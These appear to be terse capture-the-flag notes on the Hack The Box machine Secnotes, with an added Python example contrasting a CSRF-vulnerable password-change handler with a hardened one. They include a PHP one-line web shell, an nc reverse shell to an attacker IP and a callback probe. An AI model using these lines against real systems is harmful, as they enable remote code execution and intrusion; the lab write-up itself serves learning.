HTB Secnotes - SQL injection & CSRF
xss vuln ---
What requests are being sent?
direct URL? --> put "http://Attackers_IP:9001" in a comment section and see what it does (does anything fetch it?)
nc -nvlp 9001
got a connection back!
create a test page
host the page on python http.server and see what it does --> does the link actually work?
if it works, this would change the password of the particular user account, like admin's (state change on a plain GET with no CSRF token)
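The password-change-by-link weakness above, seen from the defender's side as an added example (not code from the box or from HTB): a handler that changes the password on any GET carrying a session cookie, beside one that requires POST, a session-bound CSRF token checked in constant time, and the current password. The in-memory USERS/SESSIONS stores, function names and request shape are assumptions.

```python
import hmac
import secrets

# Constructed in-memory state standing in for the app's session and user stores.
USERS = {"admin": "oldpass"}
SESSIONS = {"sess-admin": {"user": "admin", "csrf": secrets.token_hex(16)}}


def vulnerable_change_password(req):
    """Changes the password on any request that carries a valid session cookie.

    A link like /change_pass.php?password=x&confirm=x planted in a comment and
    opened by the admin is enough: the browser attaches the cookie for free."""
    sess = SESSIONS.get(req.get("cookie"))
    if sess is None:
        return "not logged in"
    if req["params"].get("password") == req["params"].get("confirm"):
        USERS[sess["user"]] = req["params"]["password"]
        return "changed"
    return "mismatch"


def hardened_change_password(req):
    """Rejects cross-site requests: POST only, CSRF token tied to the session,
    and proof of the current password so a cookie alone is never enough."""
    sess = SESSIONS.get(req.get("cookie"))
    if sess is None:
        return "not logged in"
    if req["method"] != "POST":
        return "method not allowed"      # a GET link in a comment never mutates state
    token = req["params"].get("csrf", "")
    if not hmac.compare_digest(token, sess["csrf"]):
        return "bad csrf token"          # a third-party page cannot read the token
    p = req["params"]
    if p.get("current") != USERS[sess["user"]]:
        return "wrong current password"
    if not p.get("password") or p.get("password") != p.get("confirm"):
        return "mismatch"
    USERS[sess["user"]] = p["password"]
    return "changed"


# Constructed request, as the admin's browser would send it after following a planted link.
CSRF_GET = {"method": "GET", "cookie": "sess-admin",
            "params": {"password": "pwned", "confirm": "pwned"}}
```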
IIS server open and you have SMB share access to the web root (a writable web root share means anything dropped there is executed by the server).
try to create a web shell and upload it > access it!
<?php system($_REQUEST['ippsec']); ?>
nc.exe attacker_IP 9001 -e powershell
admin password was hidden inside of it > psexec win!